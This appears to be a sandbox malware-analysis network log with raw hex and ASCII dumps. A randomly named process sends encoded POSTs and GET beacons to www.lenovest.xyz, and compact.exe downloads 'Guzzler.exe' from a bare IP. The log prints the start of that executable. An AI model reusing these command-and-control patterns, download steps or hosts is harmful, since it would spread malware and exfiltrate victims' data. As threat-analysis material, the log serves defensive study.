65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Jun 5, 2024 18:28:25.542232037 CEST	212	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-268
Jun 5, 2024 18:28:25.542237043 CEST	1236	IN	Data Raw: 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 Data Ascii: 5.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119
Jun 5, 2024 18:28:25.542325974 CEST	1236	IN	Data Raw: 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 Data Ascii: nejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -
Jun 5, 2024 18:28:25.542331934 CEST	1236	IN	Data Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e Data Ascii: ke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,1
Jun 5, 2024 18:28:25.542342901 CEST	636	IN	Data Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
Jun 5, 2024 18:28:25.542386055 CEST	1236	IN	Data Raw: 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 Data Ascii: p:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012
Jun 5, 2024 18:28:25.542392015 CEST	1236	IN	Data Raw: 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 Data Ascii: 05,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53
Jun 5, 2024 18:28:25.542406082 CEST	424	IN	Data Raw: 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 Data Ascii: 39 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549"
Jun 5, 2024 18:28:25.542449951 CEST	1236	IN	Data Raw: 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 Data Ascii: 4,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
Jun 5, 2024 18:28:25.547322035 CEST	1236	IN	Data Raw: 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49729	162.0.213.94	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:28:26.978364944 CEST	1735	OUT	POST /e20q/ HTTP/1.1 Host: www.lenovest.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Origin: http://www.lenovest.xyz Referer: http://www.lenovest.xyz/e20q/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 62 4e 44 43 75 67 58 31 6e 58 47 4c 44 4b 32 75 4d 6c 61 49 5a 42 67 38 34 57 73 30 36 31 33 42 2f 4f 34 49 62 32 39 38 53 51 49 42 62 72 67 4f 63 49 44 61 5a 68 6d 72 79 6e 47 74 48 35 4f 75 4d 65 6a 66 5a 56 53 44 33 61 5a 33 65 4f 5a 72 4a 59 76 46 43 34 72 6c 52 6d 70 48 4e 64 61 71 57 4c 79 72 52 46 4f 79 44 77 6a 4d 69 2b 43 43 5a 7a 6b 51 39 43 53 5a 61 6d 63 74 65 61 70 70 6c 39 73 6e 6a 41 6a 41 45 43 4a 64 35 6f 53 75 78 62 41 58 38 43 75 42 4e 63 47 76 65 42 65 32 43 6f 36 4c 66 44 48 76 76 42 2f 53 31 79 6e 61 2b 38 47 67 49 69 4d 72 64 6e 43 50 50 31 64 58 37 45 2b 2b 59 4d 77 68 47 6c 61 69 70 48 65 39 45 35 34 6b 79 56 47 4d 48 48 62 54 4b 66 4a 6b 75 72 7a 70 51 4d 43 56 6b 79 6f 62 74 70 5a 56 64 48 67 6e 5a 56 44 44 59 52 31 34 31 45 64 4a 45 62 44 46 6f 35 33 71 64 30 32 47 47 43 38 37 69 45 41 49 38 2f 49 4a 51 6a 49 35 55 6d 37 58 41 4d 73 6f 55 64 59 73 37 67 37 6a 68 6f 2f 39 6c 73 44 6b 33 34 68 58 67 46 4a 52 54 49 30 6e 48 77 6e 6a 55 72 62 4a 38 7a 39 30 64 4c 50 [TRUNCATED] Data Ascii: 9d=bNDCugX1nXGLDK2uMlaIZBg84Ws0613B/O4Ib298SQIBbrgOcIDaZhmrynGtH5OuMejfZVSD3aZ3eOZrJYvFC4rlRmpHNdaqWLyrRFOyDwjMi+CCZzkQ9CSZamcteappl9snjAjAECJd5oSuxbAX8CuBNcGveBe2Co6LfDHvvB/S1yna+8GgIiMrdnCPP1dX7E++YMwhGlaipHe9E54kyVGMHHbTKfJkurzpQMCVkyobtpZVdHgnZVDDYR141EdJEbDFo53qd02GGC87iEAI8/IJQjI5Um7XAMsoUdYs7g7jho/9lsDk34hXgFJRTI0nHwnjUrbJ8z90dLPcqbH8SidYFejjNKDqUsb+HIqbG7ch3wY5+7gQsTTFj17FleujLCpgzjDjrBMfAVWOuoP032H7Nqo8Zw4mEVU0DooIX6zLFCy5AMCyirP5e35nQoeknTyufamabPSiwS0gayCK6JSJn2qIG9YZ3u8CFD5ByC2xa7Bsz1ZZEufn/Sn9gL4oIHyPwdl8NF+1P+6toNig4Sc3iVAqH93z4z1Ej01oqmvNBAWBmdDjRE5QbFnR/cVUjNgEV+eneRWQ7L/SV2ym7Dmt9s3H2N9JNdv0wzFtqjQO5QrOSGozFBBli0A7PVziIwMTu/gQsgwe6tdL0MaW0PcP6W6Oq7Kq0zlCrUxkxCW2ZdTKSuPAdsSYGbuIM+t+qg2CZxtR3hJHURIHsFRixpacKJzlPvjry69pr1/wTKWQ4P/VjsTb4GuqmjxjNceksFiztHTtoIFLIQ3gd/ZXYGxkuaIC0QFHdXdJIrqQSmk7BMDMzQdMqSWr4djjIkbmnaFEDpzo28PTl3aR28OsIuncch9wwhyIVxF+ddIaEivXlGohe2jyMVuC8XEocVpYyFvD0QsToIAAepYRLS1DklD+2BXCEsSRUSJAxBVvxFmtykjacJl97GCvQyVpcxZLr4UCo0CPQTxAkUVXO5JGDeV3w8HXmuZqggIr8ACjh94ZIZwAQ [TRUNCATED]
Jun 5, 2024 18:28:27.782365084 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 16:28:27 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Jun 5, 2024 18:28:27.782378912 CEST	212	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-268
Jun 5, 2024 18:28:27.782807112 CEST	1236	IN	Data Raw: 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 Data Ascii: 5.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119
Jun 5, 2024 18:28:27.782883883 CEST	1236	IN	Data Raw: 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 Data Ascii: nejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -
Jun 5, 2024 18:28:27.782902956 CEST	1236	IN	Data Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e Data Ascii: ke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,1
Jun 5, 2024 18:28:27.782915115 CEST	1236	IN	Data Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
Jun 5, 2024 18:28:27.782932997 CEST	848	IN	Data Raw: 20 20 69 64 3d 22 70 61 74 68 34 35 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 Data Ascii: id="path4533" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80
Jun 5, 2024 18:28:27.782946110 CEST	1236	IN	Data Raw: 34 20 2d 31 2e 32 33 37 33 31 2c 33 34 2e 31 31 35 33 36 20 2d 32 2e 31 38 30 31 34 2c 35 33 2e 36 32 30 31 35 20 2d 30 2e 39 34 32 38 32 2c 31 39 2e 35 30 34 37 38 20 2d 32 2e 30 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31 Data Ascii: 4 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />
Jun 5, 2024 18:28:27.782954931 CEST	212	IN	Data Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 34 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 39 2e 32 35 34 37 38 2c 31 32 34 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e Data Ascii: th id="path4549" d="m 79.25478,124.23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.29839
Jun 5, 2024 18:28:27.782968998 CEST	1236	IN	Data Raw: 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 Data Ascii: 4,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
Jun 5, 2024 18:28:27.787244081 CEST	1236	IN	Data Raw: 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49730	162.0.213.94	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:28:29.526376963 CEST	447	OUT	GET /e20q/?9d=WPritX3A9R+ySLDHKkvQUC0K3y08yWvw5+tRT3chZ2wpNsEUE7uyewm5xlmwIO2sKs7uf3/86JENB8xtRbvRK6PKTUJmFuSnUKaTSFytHSrQj6qyTDgK0xjAREMwU5wVtegslCXYDiBq&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1 Host: www.lenovest.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 5, 2024 18:28:31.295506954 CEST	211	IN	HTTP/1.1 200 OK Date: Wed, 05 Jun 2024 16:28:31 GMT Server: Apache Content-Length: 60 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 55 50 33 34 77 48 50 46 6c 78 32 6e 42 4b 43 43 4b 33 50 66 42 32 64 38 76 57 78 50 68 43 43 38 67 6f 4d 49 46 43 35 69 5a 55 45 4b 65 75 59 69 4d 4f 57 4f 54 54 57 37 30 48 47 34 Data Ascii: UP34wHPFlx2nBKCCK3PfB2d8vWxPhCC8goMIFC5iZUEKeuYiMOWOTTW70HG4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49731	2.56.245.142	80	7628	C:\Windows\SysWOW64\compact.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:28:35.306394100 CEST	186	OUT	GET /Guzzler.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Host: 2.56.245.142 Connection: Keep-Alive Cache-Control: no-cache
Jun 5, 2024 18:28:36.122766018 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 05 Jun 2024 16:28:35 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Tue, 04 Jun 2024 18:51:40 GMT ETag: "17d520-61a14f0b9e40f" Accept-Ranges: bytes Content-Length: 1561888 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad f1 28 81 e9 90 46 d2 e9 90 46 d2 e9 90 46 d2 2a 9f 19 d2 eb 90 46 d2 e9 90 47 d2 77 90 46 d2 2a 9f 1b d2 e6 90 46 d2 bd b3 76 d2 e3 90 46 d2 2e 96 40 d2 e8 90 46 d2 52 69 63 68 e9 90 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f0 d4 f6 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 7c 02 00 00 04 00 00 6b 32 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 50 0a 00 00 04 00 00 cf fb 17 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 85 00 00 a0 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(FFFFGwFFvF.@FRichFPEL]d\|k2@P@<0Q8.textbd `.rdataJh@@.dataU\|@.ndata.rsrc0QR@@
Jun 5, 2024 18:28:36.122792006 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: U\}t+}FEuHBHPuuu@BSV5BEWPu@eEEPu@}e`@FRVV
Jun 5, 2024 18:28:36.122802973 CEST	1236	IN	Data Raw: 8b fa c1 e6 0a b9 00 00 43 00 89 5d fc c1 e7 0a 03 f1 03 f9 8d 4d cc 89 0d 54 b8 40 00 8b 4d c8 83 c1 fe 83 f9 41 0f 87 2f 15 00 00 ff 24 8d ca 29 40 00 53 50 e8 a0 3c 00 00 e9 b2 0e 00 00 ff 05 cc eb 42 00 39 5d f8 0f 84 a3 0e 00 00 53 ff 15 78 Data Ascii: C]MT@MA/$)@SP<B9]Sx@PHSPSPf<S.YU3@P@uD@9]u&BjBYUMBBBwE4B3;
Jun 5, 2024 18:28:36.122838020 CEST	1236	IN	Data Raw: 00 6a f0 e8 f3 11 00 00 ff 75 d0 50 e8 96 3e 00 00 e9 71 10 00 00 6a 01 e8 de 11 00 00 50 e8 d2 46 00 00 e9 8b 0c 00 00 6a 02 e8 aa 11 00 00 6a 03 89 45 ec 89 55 f0 e8 9d 11 00 00 59 8b f8 8b 45 ec 59 6a 01 89 7d b0 89 55 b4 89 45 08 e8 a8 11 00 Data Ascii: juP>qjPFjjEUYEYj}UEPEF9]uE9]M;}<;;~EPVLF9]}VWFEy]E=0j 8j1/9]PVu@uzE$@3GW
Jun 5, 2024 18:28:36.122844934 CEST	1236	IN	Data Raw: 81 40 00 6a 02 8b f8 e8 f9 0c 00 00 59 8b d8 6a 48 6a 5a 57 89 55 f0 ff 15 64 80 40 00 50 53 ff 15 44 81 40 00 57 ff 75 f8 f7 d8 a3 18 b8 40 00 ff 15 f4 81 40 00 6a 03 e8 c8 0c 00 00 a3 28 b8 40 00 8a 45 dc 59 89 55 f0 ff 75 d0 8a c8 80 e1 01 c6 Data Ascii: @jYjHjZWUd@PSD@Wu@@j(@EYUu/@,@$h4@-@.@Ah@X@USujUi9]YYUPVuH@@Scj1Zj"QjHj8EEEE
Jun 5, 2024 18:28:36.122914076 CEST	1060	IN	Data Raw: f9 e8 58 2e 00 00 e9 9f 04 00 00 8b 45 f8 56 89 45 98 c7 45 9c 02 00 00 00 e8 2f 3d 00 00 57 88 5c 30 01 e8 25 3d 00 00 88 5c 38 01 8b 45 08 66 8b 4d d4 50 53 89 75 a0 89 7d a4 89 45 b2 66 89 4d a8 e8 17 2e 00 00 8d 45 98 50 ff 15 7c 81 40 00 85 Data Ascii: X.EVEE/=W\0%=\8EfMPSu}EfM.EP\|@=th jS<P3kBU33;tSU;tj9]tj"jPSWV@@f@jfEtjkjEaP
Jun 5, 2024 18:28:36.122920990 CEST	1236	IN	Data Raw: 59 89 55 f0 ff 75 d8 53 50 56 e8 7b 38 00 00 50 ff 15 38 81 40 00 39 5d d0 0f 8c 9c 02 00 00 e9 3d 02 00 00 56 e8 60 38 00 00 3b c3 0f 84 89 02 00 00 50 ff 15 34 81 40 00 e9 7d 02 00 00 57 e8 46 38 00 00 3b c3 74 12 8d 8d 38 fe ff ff 51 50 ff 15 Data Ascii: YUuSPV{8P8@9]=V`8;P4@}WF8;t8QP0@u?ESj8QP,@uE)PW7dPV3jEf{VuY2ujeV3jh@V3EB5X@
